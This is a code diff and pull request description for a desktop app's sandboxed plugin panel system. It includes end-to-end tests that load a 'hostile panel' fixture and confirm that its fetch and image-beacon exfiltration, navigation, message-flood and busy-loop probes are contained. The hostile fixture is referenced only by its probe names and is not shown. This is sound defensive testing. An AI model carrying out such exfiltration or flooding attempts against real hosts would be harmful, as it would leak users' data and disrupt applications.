+   *  keys for UNINSTALLED plugins are dropped (reset to Explorer); merely
+   *  disabled plugins keep their key and fall back at render time via
+   *  resolveRightSidebarEffectiveTab. Omit when the installed list is not
+   *  known yet (early hydration) — the render-time fallback still guards. */
+  installedPluginTabKeys?: ReadonlySet<string>
+}
+
 export function normalizeRightSidebarRoute(
   tab: unknown,
-  explorerView?: unknown
+  explorerView?: unknown,
+  options?: NormalizeRightSidebarRouteOptions
 ): RightSidebarRoute {
   // Why: older builds persisted Search as a standalone activity tab.
   if (tab === 'search') {
     return { rightSidebarTab: 'explorer', rightSidebarExplorerView: 'search' }
+  }
+  // Why: plugin tabs are open-ended keys; validate their shape so a persisted
+  // plugin tab isn't reset to Explorer on restart.
+  if (typeof tab === 'string' && isPluginPanelTabKey(tab)) {
+    if (options?.installedPluginTabKeys && !options.installedPluginTabKeys.has(tab)) {
+      return { rightSidebarTab: 'explorer', rightSidebarExplorerView: 'files' }
+    }
+    return { rightSidebarTab: tab, rightSidebarExplorerView: 'files' }
   }
   if (
     tab === 'explorer' ||

--- a/src/shared/plugins/plugin-hostile-fixture.test.ts
+++ b/src/shared/plugins/plugin-hostile-fixture.test.ts
@@ -1,0 +1,29 @@
+import { readFile } from 'node:fs/promises'
+import { join } from 'node:path'
+import { Script } from 'node:vm'
+import { describe, expect, it } from 'vitest'
+
+describe('hostile panel fixture', () => {
+  it('is complete JavaScript and retains every containment probe', async () => {
+    const html = await readFile(
+      join(process.cwd(), 'examples', 'plugins', 'hostile-panel', 'panel.html'),
+      'utf8'
+    )
+    const script = html.match(/<script>([\s\S]*?)<\/script>/)?.[1]
+
+    expect(script).toBeTruthy()
+    if (!script) {
+      throw new Error('hostile fixture script is missing')
+    }
+    expect(() => new Script(script)).not.toThrow()
+    expect(html).toContain('self-navigation')
+    expect(html).toContain('meta-refresh-navigation')
+    expect(html).toContain('Navigation probes are opt-in')
+    expect(html).toContain("window.name = ''")
+    expect(html).toContain('oversized-message')
+    expect(html).toContain('message-flood')
+    expect(html).toContain("data.errorCode === 'rate_limited'")
+    expect(html).toContain('busy-loop')
+    expect(html.trimEnd()).toMatch(/<\/html>$/)
+  })
+})

--- a/src/shared/plugins/plugin-panel-shell.test.ts
+++ b/src/shared/plugins/plugin-panel-shell.test.ts
@@ -1,9 +1,19 @@
 // @vitest-environment happy-dom
 
 import { describe, expect, it } from 'vitest'
-import { buildPluginPanelShellHtml, PLUGIN_PANEL_CSP } from './plugin-panel-shell'
+import {
+  buildPluginPanelShellHtml,
+  PANEL_DESIGN_TOKEN_ALLOWLIST,
+  PLUGIN_PANEL_CSP
+} from './plugin-panel-shell'
 
 describe('buildPluginPanelShellHtml', () => {
+  it('keeps destructive surface and foreground tokens paired', () => {
+    expect(PANEL_DESIGN_TOKEN_ALLOWLIST).toEqual(
+      expect.arrayContaining(['--destructive', '--destructive-foreground'])
+    )
+  })
+
   it('places CSP and navigation guards before plugin content', () => {
     const html = buildPluginPanelShellHtml('<main id="plugin-content">Plugin</main>')
     const pluginOffset = html.indexOf('plugin-content')

--- a/src/shared/plugins/plugin-panel-shell.ts
+++ b/src/shared/plugins/plugin-panel-shell.ts
@@ -47,6 +47,7 @@ export const PANEL_DESIGN_TOKEN_ALLOWLIST = [
   '--accent',
   '--accent-foreground',
   '--destructive',
+  '--destructive-foreground',
   '--border',
   '--input',
   '--ring',

--- a/tests/e2e/plugin-panel-containment.spec.ts
+++ b/tests/e2e/plugin-panel-containment.spec.ts
@@ -1,0 +1,344 @@
+/**
+ * Invariant: a plugin panel cannot exfiltrate, navigate, or bypass bridge budgets.
+ * Oracle: a permissive loopback server receives zero requests while the real
+ * sandboxed iframe reports CSP/navigation containment and actual budget refusals.
+ * Chromium is required because Vitest cannot exercise CSP or iframe sandboxing.
+ * Maturity: experimental until this has CI soak history on all desktop platforms.
+ */
+
+import { cp, mkdtemp, readFile, rm, writeFile } from 'node:fs/promises'
+import { createServer, type Server } from 'node:http'
+import { tmpdir } from 'node:os'
+import { join } from 'node:path'
+import type { AddressInfo } from 'node:net'
+import type { ElectronApplication, FrameLocator, Page, TestInfo } from '@stablyai/playwright-test'
+import { expect, test } from './helpers/orca-app'
+
+type InstalledPanel = {
+  pluginKey: string
+  tabKey: string
+  title: string
+}
+
+type ProbeServer = {
+  origin: string
+  requests: string[]
+  close: () => Promise<void>
+}
+
+type PanelDocumentSnapshot = {
+  url: string
+  title: string
+  html: string
+}
+
+type ElectronFrameProcess = {
+  frameTreeNodeId: number
+  parentFrameTreeNodeId: number | null
+  processId: number
+  osProcessId: number
+  url: string
+  origin: string
+  marker: string | null
+}
+
+async function closeServer(server: Server): Promise<void> {
+  await new Promise<void>((resolve, reject) => {
+    server.close((error) => {
+      if (error) {
+        reject(error)
+        return
+      }
+      resolve()
+    })
+  })
+}
+
+async function startPermissiveProbeServer(): Promise<ProbeServer> {
+  const requests: string[] = []
+  const gif = Buffer.from('R0lGODlhAQABAAD/ACwAAAAAAQABAAACADs=', 'base64')
+  const server = createServer((request, response) => {
+    requests.push(request.url ?? '/')
+    response.setHeader('Access-Control-Allow-Origin', '*')
+    if (request.url?.includes('beacon.gif')) {
+      response.writeHead(200, { 'Content-Type': 'image/gif', 'Content-Length': gif.byteLength })
+      response.end(gif)
+      return
+    }
+    response.writeHead(200, { 'Content-Type': 'text/plain; charset=utf-8' })
+    response.end('permissive probe response')
+  })
+  await new Promise<void>((resolve) => server.listen(0, '127.0.0.1', resolve))
+  const port = (server.address() as AddressInfo).port
+  return {
+    origin: `http://127.0.0.1:${port}`,
+    requests,
+    close: () => closeServer(server)
+  }
+}
+
+async function materializeHostilePlugin(origin: string): Promise<string> {
+  const tempRoot = await mkdtemp(join(tmpdir(), 'orca-hostile-panel-e2e-'))
+  const pluginRoot = join(tempRoot, 'hostile-panel')
+  await cp(join(process.cwd(), 'examples', 'plugins', 'hostile-panel'), pluginRoot, {
+    recursive: true
+  })
+  const panelPath = join(pluginRoot, 'panel.html')
+  const panelHtml = await readFile(panelPath, 'utf8')
+  await writeFile(panelPath, panelHtml.replaceAll('https://example.com', origin))
+  return pluginRoot
+}
+
+async function installApprovedPanel(page: Page, sourcePath: string): Promise<InstalledPanel> {
+  return page.evaluate(async (pluginPath) => {
+    const settings = await window.api.settings.set({ pluginSystemEnabled: true })
+    window.__store?.setState({ settings })
+    await window.api.plugins.refresh()
+    const installed = await window.api.plugins.install({ kind: 'local-path', path: pluginPath })
+    if (!installed.ok) {
+      throw new Error(installed.error)
+    }
+    const listed = await window.api.plugins.refresh()
+    const plugin = listed.find((entry) => entry.pluginKey === installed.pluginKey)
+    if (!plugin?.consentFingerprint || !plugin.panels[0]) {
+      throw new Error(`installed plugin ${installed.pluginKey} has no reviewable panel`)
+    }
+    const approved = await window.api.plugins.consent({
+      pluginKey: plugin.pluginKey,
+      reviewedFingerprint: plugin.consentFingerprint,
+      decision: 'approve'
+    })
+    const approvedPlugin = approved.find((entry) => entry.pluginKey === plugin.pluginKey)
+    const panel = approvedPlugin?.panels[0]
+    if (!panel) {
+      throw new Error(`approved plugin ${plugin.pluginKey} has no panel`)
+    }
+    return { pluginKey: plugin.pluginKey, tabKey: panel.tabKey, title: panel.title }
+  }, sourcePath)
+}
+
+async function openPanel(page: Page, panel: InstalledPanel): Promise<void> {
+  await page.evaluate(async () => {
+    const store = window.__store?.getState()
+    if (!store) {
+      throw new Error('window.__store is unavailable')
+    }
+    if (!store.rightSidebarOpen) {
+      store.toggleRightSidebar()
+    }
+    // Refresh after the sidebar subscription exists so this isolated profile
+    // cannot miss the install/consent change events emitted just before mount.
+    await window.api.plugins.refresh()
+  })
+  const panelButton = page.getByRole('button', { name: panel.title })
+  await expect(panelButton).toBeVisible({ timeout: 15_000 })
+  await panelButton.click()
+  await expect(page.locator(`iframe[title="${panel.title}"]`)).toBeVisible({ timeout: 15_000 })
+}
+
+async function attachProbeRequests(testInfo: TestInfo, requests: readonly string[]): Promise<void> {
+  await testInfo.attach('hostile-panel-loopback-requests', {
+    body: Buffer.from(JSON.stringify(requests, null, 2)),
+    contentType: 'application/json'
+  })
+}
+
+async function readPanelDocument(frame: FrameLocator): Promise<PanelDocumentSnapshot> {
+  return frame.locator('html').evaluate((element) => ({
+    url: element.ownerDocument.location.href,
+    title: element.ownerDocument.title,
+    html: element.outerHTML
+  }))
+}
+
+async function inspectElectronFrameProcesses(
+  electronApp: ElectronApplication,
+  pageUrl: string
+): Promise<ElectronFrameProcess[]> {
+  return electronApp.evaluate(async ({ BrowserWindow }, expectedUrl) => {
+    const browserWindow =
+      BrowserWindow.getAllWindows().find(
+        (candidate) => candidate.webContents.getURL() === expectedUrl
+      ) ?? BrowserWindow.getAllWindows()[0]
+    if (!browserWindow) {
+      return []
+    }
+    return Promise.all(
+      browserWindow.webContents.mainFrame.framesInSubtree.map(async (frame) => {
+        let marker: string | null = null
+        try {
+          const value = await frame.executeJavaScript(
+            "document.querySelector('h1')?.textContent ?? null"
+          )
+          marker = typeof value === 'string' ? value : null
+        } catch {
+          // A frame can detach while Chromium reports the live frame tree.
+        }
+        return {
+          frameTreeNodeId: frame.frameTreeNodeId,
+          parentFrameTreeNodeId: frame.parent?.frameTreeNodeId ?? null,
+          processId: frame.processId,
+          osProcessId: frame.osProcessId,
+          url: frame.url,
+          origin: frame.origin,
+          marker
+        }
+      })
+    )
+  }, pageUrl)
+}
+
+test('contains hostile panel network, navigation, and bridge-flood probes', async ({
+  orcaPage
+}, testInfo) => {
+  testInfo.annotations.push({ type: 'maturity', description: 'experimental' })
+  const server = await startPermissiveProbeServer()
+  const pluginRoot = await materializeHostilePlugin(server.origin)
+  const tempRoot = join(pluginRoot, '..')
+  const appUrl = orcaPage.url()
+  const browserEvents: string[] = []
+  const panelDocuments: PanelDocumentSnapshot[] = []
+  orcaPage.on('console', (message) => {
+    browserEvents.push(`console:${message.type()}:${message.text()}`)
+  })
+  orcaPage.on('pageerror', (error) => {
+    browserEvents.push(`pageerror:${error.message}`)
+  })
+  orcaPage.on('framenavigated', (frame) => {
+    browserEvents.push(`framenavigated:${frame.url()}`)
+  })
+  try {
+    const panel = await installApprovedPanel(orcaPage, pluginRoot)
+    await openPanel(orcaPage, panel)
+
+    const iframe = orcaPage.locator(`iframe[title="${panel.title}"]`)
+    await expect(iframe).toHaveAttribute('sandbox', 'allow-scripts')
+    const frame = orcaPage.frameLocator(`iframe[title="${panel.title}"]`)
+    await expect(frame.locator('meta[http-equiv="Content-Security-Policy"]')).toHaveAttribute(
+      'content',
+      /connect-src 'none'.*img-src data:/
+    )
+    const initialPanelDebug = await frame.locator('html').evaluate((element) => ({
+      readyState: element.ownerDocument.readyState,
+      scriptCount: element.ownerDocument.scripts.length,
+      resultCount: element.querySelectorAll('[data-probe]').length,
+      bodyText: element.ownerDocument.body?.textContent ?? '',
+      scriptText: Array.from(element.ownerDocument.scripts, (script) => script.textContent ?? '')
+    }))
+    await testInfo.attach('hostile-panel-initial-debug', {
+      body: Buffer.from(JSON.stringify(initialPanelDebug, null, 2)),
+      contentType: 'application/json'
+    })
+
+    for (const probe of ['fetch-exfil', 'img-beacon']) {
+      await expect(frame.locator(`[data-probe="${probe}"]`)).toHaveAttribute(
+        'data-contained',
+        'true',
+        { timeout: 5_000 }
+      )
+    }
+
+    await frame.getByRole('button', { name: 'Run bridge budget probes' }).click()
+    for (const probe of ['oversized-message', 'message-flood']) {
+      await expect(frame.locator(`[data-probe="${probe}"]`)).toHaveAttribute(
+        'data-contained',
+        'true',
+        { timeout: 5_000 }
+      )
+    }
+
+    expect(server.requests).toEqual([])
+    expect(orcaPage.url()).toBe(appUrl)
+    await expect(iframe).toBeVisible()
+
+    const initialDocument = await readPanelDocument(frame)
+    panelDocuments.push(initialDocument)
+    for (const navigation of [
+      { button: 'Try top navigation', probe: 'top-navigation' },
+      { button: 'Try self navigation', probe: 'self-navigation' },
+      { button: 'Try anchor and form navigation', probe: 'anchor-form-navigation' },
+      { button: 'Try meta refresh navigation', probe: 'meta-refresh-navigation' }
+    ]) {
+      await frame.getByRole('button', { name: navigation.button }).click()
+      await expect(frame.locator(`[data-probe="${navigation.probe}"]`)).toHaveAttribute(
+        'data-contained',
+        'true',
+        { timeout: 5_000 }
+      )
+      const currentDocument = await readPanelDocument(frame)
+      panelDocuments.push(currentDocument)
+      expect(currentDocument.url).toBe(initialDocument.url)
+      expect(currentDocument.html).toContain('Hostile panel fixture')
+      expect(server.requests).toEqual([])
+      expect(orcaPage.url()).toBe(appUrl)
+    }
+  } finally {
+    await attachProbeRequests(testInfo, server.requests)
+    await testInfo.attach('hostile-panel-browser-events', {
+      body: Buffer.from(browserEvents.join('\n')),
+      contentType: 'text/plain'
+    })
+    await testInfo.attach('hostile-panel-documents', {
+      body: Buffer.from(JSON.stringify(panelDocuments, null, 2)),
+      contentType: 'application/json'
+    })
+    await server.close()
+    await rm(tempRoot, { recursive: true, force: true })
+  }
+})
+
+test('detects and suspends a busy-looping panel in an isolated renderer', async ({
+  electronApp,
+  orcaPage
+}, testInfo) => {
+  testInfo.annotations.push({ type: 'maturity', description: 'experimental' })
+  const server = await startPermissiveProbeServer()
+  const pluginRoot = await materializeHostilePlugin(server.origin)
+  const tempRoot = join(pluginRoot, '..')
+  const appUrl = orcaPage.url()
+  let frameProcesses: ElectronFrameProcess[] = []
+  try {
+    const panel = await installApprovedPanel(orcaPage, pluginRoot)
+    await openPanel(orcaPage, panel)
+
+    await expect
+      .poll(
+        async () => {
+          frameProcesses = await inspectElectronFrameProcesses(electronApp, appUrl)
+          return frameProcesses.some((frame) => frame.marker === 'Hostile panel fixture')
+        },
+        { timeout: 5_000, message: 'hostile panel should appear in Electron frame tree' }
+      )
+      .toBe(true)
+
+    const mainFrame = frameProcesses.find((frame) => frame.parentFrameTreeNodeId === null)
+    const panelFrame = frameProcesses.find((frame) => frame.marker === 'Hostile panel fixture')
+    expect(mainFrame).toBeTruthy()
+    expect(panelFrame).toBeTruthy()
+    expect(panelFrame?.processId).not.toBe(mainFrame?.processId)
+    expect(panelFrame?.osProcessId).not.toBe(mainFrame?.osProcessId)
+
+    const iframe = orcaPage.locator(`iframe[title="${panel.title}"]`)
+    await iframe.evaluate((element) => {
+      const panelWindow = (element as HTMLIFrameElement).contentWindow
+      panelWindow?.postMessage({ type: 'orca-hostile-busy-probe' }, '*')
+    })
+
+    await expect(
+      orcaPage.getByText('This plugin panel stopped responding and was suspended.')
+    ).toBeVisible({ timeout: 20_000 })
+    await expect(
+      orcaPage.getByRole('button', { name: new RegExp(`${panel.title}.*Error`) })
+    ).toBeVisible()
+    expect(orcaPage.url()).toBe(appUrl)
+    expect(server.requests).toEqual([])
+  } finally {
+    await testInfo.attach('hostile-panel-frame-processes', {
+      body: Buffer.from(JSON.stringify(frameProcesses, null, 2)),
+      contentType: 'application/json'
+    })
+    await attachProbeRequests(testInfo, server.requests)
+    await server.close()
+    await rm(tempRoot, { recursive: true, force: true })
+  }
+})


### PR DESCRIPTION
## Summary

Adds the experimental renderer-facing panel layer on top of #8460:

- Host-generated panel shell injects strict CSP before plugin content parses: `default-src 'none'`, no network connections, inline script/style only, and data-only image/font sources.
- Sandboxed iframe uses `allow-scripts` without `allow-same-origin`; panel HTML is delivered through host-owned `srcDoc`.
- Realpath containment rejects panel entries that resolve outside the installed plugin tree.
- Bridge admission binds the host-owned plugin identity, verifies `event.source`, validates Host API parameters, and enforces per-plugin size/rate/pending budgets.
- Watchdog demotes unresponsive or busy-looping panels to persistent host-owned error badges.
- Fresh iframe revisions support recovery, theme changes, and development hot reload.
- Curated Orca design tokens and light/dark classes are injected without exposing the full application stylesheet.
- Right-sidebar plugin routes are normalized only after authoritative discovery; uninstalled tabs are dropped while feature-flag-disabled routes are preserved.

All panel extension points remain experimental.

## Security evidence

Serialized Electron 43.1.0 acceptance run on macOS:

- Hostile fetch and image exfiltration attempts were blocked by CSP.
- Top-level and nested navigation attempts were contained.
- Oversized and flood bridge traffic was rejected/rate-limited.
- The hostile iframe ran in a renderer process separate from the host.
- A busy-loop panel was detected, suspended, and represented by a host-owned error badge.
- A symlinked panel entry is refused by automated realpath-containment coverage.

Command:

`pnpm exec playwright test tests/e2e/plugin-demo.spec.ts tests/e2e/plugin-panel-containment.spec.ts tests/e2e/plugin-startup-budget.spec.ts --config tests/playwright.config.ts --project electron-headless --workers=1`

Result: 4 passed in 1.1 minutes.

The approved screenshot uploader could not obtain a GitHub upload token. Evidence is therefore recorded as the reproducible transcript above; local screenshots were deliberately not committed. Process-isolation live evidence is currently macOS-only. Signed packaged-app and Windows/Linux evidence remain CI/follow-up work.

## Validation

Validated at the top of the stack:

- `pnpm typecheck` — passed.
- `pnpm lint` — passed; only pre-existing warnings outside this stack.
- Plugin/seam Vitest matrix — 55 files, 315 tests passed.
- Startup unit gate — 20 samples, P95 2.63 ms.
- Real Electron demo, containment, busy-loop, and startup A/B tests — 4 passed.

## Stack

1. #8460 — main-process kernel and enforcement.
2. **This PR:** sandboxed panel host and renderer.
3. Next: consent/settings UI and demo workflow.

Draft only — do not merge until the full stack has been reviewed together.
